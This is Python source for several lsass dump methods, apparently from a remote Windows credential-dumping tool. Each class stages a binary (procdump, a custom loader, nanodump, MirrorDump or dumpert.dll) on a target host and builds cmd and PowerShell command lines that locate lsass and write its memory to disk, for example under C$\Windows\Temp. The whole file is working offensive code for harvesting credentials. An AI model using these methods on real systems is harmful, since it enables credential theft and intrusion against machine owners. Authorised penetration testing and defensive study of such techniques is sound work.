class DumpMethod(IDumpMethod):
    """Dump lsass with procdump, staged on the target through ``Dependency``.

    Both command variants write the dump to ``dump_path + dump_name`` on the
    remote host. Those two attributes are not defined here — presumably they
    are inherited from ``IDumpMethod`` (confirm). The extension is pinned to
    ``dmp`` and ``custom_dump_ext_support`` is off.
    """

    custom_dump_ext_support = False
    dump_ext = "dmp"

    def __init__(self, session, timeout):
        super().__init__(session, timeout)
        # procdump.exe is resolved/uploaded by the shared Dependency helper.
        self.procdump = Dependency("procdump", "procdump.exe")

    def prepare(self, options):
        """Stage procdump; returns whatever ``prepare_dependencies`` returns."""
        return self.prepare_dependencies(options, [self.procdump])

    def clean(self):
        """Remove the staged procdump binary via ``clean_dependencies``."""
        self.clean_dependencies([self.procdump])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        """Return the ``cmd`` and ``pwsh`` command lines for this method.

        The three parameters are accepted for interface compatibility only and
        are never read; the output location comes from ``self.dump_path`` and
        ``self.dump_name``. The cmd form locates the lsass PID with
        ``tasklist | find``, the PowerShell form with ``Get-Process lsass``;
        both leave the dump on disk at the composed path.
        """
        tool = self.procdump.get_remote_path()
        target = f"{self.dump_path}{self.dump_name}"
        # cmd.exe has no Get-Process; the PID is parsed out of tasklist output.
        find_pid = (
            'for /f "tokens=2 delims= " %J in '
            '(\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\')'
        )
        via_cmd = f"{find_pid} do {tool} -accepteula -o -ma %J {target}"
        via_pwsh = f"{tool} -accepteula -o -ma (Get-Process lsass).Id {target}"
        return {"cmd": via_cmd, "pwsh": via_pwsh}
class DumpMethod(IDumpMethod):
    """Dump lsass by running a staged loader executable against the lsass PID.

    Output location is fixed: ``\\Windows\\Temp\\tmp.dmp`` on the ``C$``
    share, and neither the path nor the name can be customised (both
    ``custom_*_support`` flags are False). ``calc.dll`` is staged next to
    the loader but is not referenced by either command line built here.
    """

    custom_dump_path_support = False
    custom_dump_name_support = False
    dump_name = "tmp.dmp"
    dump_share = "C$"
    dump_path = "\\Windows\\Temp\\"

    def __init__(self, session, timeout):
        super().__init__(session, timeout)
        self.loader = Dependency("loader", "loader.exe")
        self.dll = Dependency("dll", "calc.dll")

    def prepare(self, options):
        """Stage the loader and the DLL; returns ``prepare_dependencies``'s result."""
        return self.prepare_dependencies(options, [self.loader, self.dll])

    def clean(self):
        """Remove both staged files via ``clean_dependencies``."""
        self.clean_dependencies([self.loader, self.dll])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        """Return the ``cmd`` and ``pwsh`` command lines for this method.

        The parameters are accepted for interface compatibility only and are
        not read. The cmd form resolves the lsass PID with ``tasklist | find``
        and hands it to the loader; the PowerShell form uses
        ``(Get-Process lsass).Id``.
        """
        find_pid = (
            'for /f "tokens=2 delims= " %J in '
            '(\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\')'
        )
        via_cmd = f"{find_pid} do {self.loader.get_remote_path()} %J"
        # NOTE(review): the PowerShell form composes the path from
        # remote_path + file rather than calling get_remote_path(); presumably
        # equivalent — confirm against Dependency.
        via_pwsh = f"{self.loader.remote_path}{self.loader.file} (Get-Process lsass).Id"
        return {"cmd": via_cmd, "pwsh": via_pwsh}
class DumpMethod(IDumpMethod):
    """Dump lsass with nanodump; one command line serves both cmd and PowerShell.

    ``dump_path`` / ``dump_name`` are not defined in this class — presumably
    inherited from ``IDumpMethod`` (confirm). The output is written under
    ``C:\\`` followed by those two values.
    """

    def __init__(self, session, timeout):
        super().__init__(session, timeout)
        self.nanodump = Dependency("nanodump", "nanodump.exe")

    def prepare(self, options):
        """Stage nanodump; returns ``prepare_dependencies``'s result."""
        return self.prepare_dependencies(options, [self.nanodump])

    def clean(self):
        """Remove the staged nanodump binary via ``clean_dependencies``."""
        self.clean_dependencies([self.nanodump])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        """Return the same command line under both the ``cmd`` and ``pwsh`` keys.

        The parameters are accepted for interface compatibility only and are
        not read. nanodump resolves lsass itself, so no PID lookup is embedded;
        ``-v --write`` sends the dump to the composed on-disk path.
        """
        output = f"C:\\{self.dump_path}{self.dump_name}"
        line = f"{self.nanodump.get_remote_path()} -v --write {output}"
        return {"cmd": line, "pwsh": line}
class DumpMethod(IDumpMethod):
    """Dump lsass with MirrorDump; one command line serves both cmd and PowerShell.

    ``dump_path`` / ``dump_name`` are not defined in this class — presumably
    inherited from ``IDumpMethod`` (confirm).
    """

    def __init__(self, session, timeout):
        super().__init__(session, timeout)
        self.mirrordump = Dependency("mirrordump", "Mirrordump.exe")

    def prepare(self, options):
        """Stage MirrorDump; returns ``prepare_dependencies``'s result."""
        return self.prepare_dependencies(options, [self.mirrordump])

    def clean(self):
        """Remove the staged MirrorDump binary via ``clean_dependencies``."""
        self.clean_dependencies([self.mirrordump])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        """Return the same command line under both the ``cmd`` and ``pwsh`` keys.

        The parameters are accepted for interface compatibility only and are
        not read. ``-f`` receives the composed dump path; ``-d`` receives an
        8-character alphanumeric ``.dll`` name drawn with ``random.choice``,
        so it differs on every call (``random`` is not a CSPRNG, but the value
        is only a file name here, not a secret).
        """
        alphabet = string.ascii_letters + string.digits
        dll_name = "".join(random.choice(alphabet) for _ in range(8)) + ".dll"
        tool = self.mirrordump.get_remote_path()
        line = f"{tool} -f {self.dump_path}{self.dump_name} -d {dll_name}"
        return {"cmd": line, "pwsh": line}
class DumpMethod(IDumpMethod):
    """Dump lsass by invoking the ``Dump`` export of dumpert.dll through rundll32.

    Output location is fixed: ``\\Windows\\Temp\\dumpert.dmp`` on the ``C$``
    share; neither path nor name can be customised (both ``custom_*_support``
    flags are False). Note that the dump name is set by the DLL, not passed on
    the command line built here.
    """

    custom_dump_path_support = False
    custom_dump_name_support = False
    dump_name = "dumpert.dmp"
    dump_share = "C$"
    dump_path = "\\Windows\\Temp\\"

    def __init__(self, session, timeout):
        super().__init__(session, timeout)
        self.dumpertdll = Dependency("dumpertdll", "dumpert.dll")

    def prepare(self, options):
        """Stage dumpert.dll; returns ``prepare_dependencies``'s result."""
        return self.prepare_dependencies(options, [self.dumpertdll])

    def clean(self):
        """Remove the staged DLL via ``clean_dependencies``."""
        self.clean_dependencies([self.dumpertdll])

    def get_commands(self):
        """Return the same ``rundll32.exe <dll>,Dump`` line under ``cmd`` and ``pwsh``.

        NOTE(review): unlike the sibling methods, this signature takes no
        ``dump_path`` / ``dump_name`` / ``no_powershell`` parameters; a caller
        that passes them positionally or by keyword will get a TypeError.
        Presumably the caller consults the ``custom_*_support`` flags first —
        confirm.
        """
        line = f"rundll32.exe {self.dumpertdll.get_remote_path()},Dump"
        return {"cmd": line, "pwsh": line}